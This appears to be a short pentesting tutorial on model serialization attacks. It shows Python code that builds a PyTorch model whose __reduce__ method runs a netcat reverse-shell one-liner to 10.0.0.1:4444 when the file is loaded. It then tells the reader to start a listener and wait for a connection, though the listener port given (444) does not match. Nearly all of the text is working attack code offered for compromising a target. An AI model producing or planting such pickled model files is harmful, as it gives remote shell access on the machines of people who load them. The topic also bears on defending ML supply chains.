icon

Create Malicious ML Model

Last modified: 2024-07-17

Model Serialization Attack

1. Install Dependencies

It requires torch so install it:

# Create a virtual environment to avoid pulluting the host environment.
python3 -m venv myvenv
pip3 install torch

2. Create Python Script To Generate Malicious Model

Now create a Python script that generates our malicious ML model. This model executes OS command when it is evaluated.

# generate_model.py
import torch
import torch.nn as nn
import os

class EvilModel(nn.Module):
	def __init__(self):
		super(EvilModel, self).__init__()
		self.dense = nn.Linear(10, 50)
	
	def forward(self, evil):
		return self.dense(evil)
	
	def __reduce__(self):
		# Inject OS command.
		cmd = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4444 >/tmp/f"
		return os.system, (cmd,)

# Save the model
evil_model = EvilModel()
torch.save(evil_model, 'evil.pth')

3. Run Python Script

Now execute this Python script as below:

python3 generate_model.py

After that, our model named evil.pth will be generated.

4. Compromise Target System using the Model

If our malicious model is loaded/trained/evaluated in the target system, the OS command is executed and we can get reverse shell, so we need to wait for incoming connection by staring a listener in attack machine:

nc -lvnp 444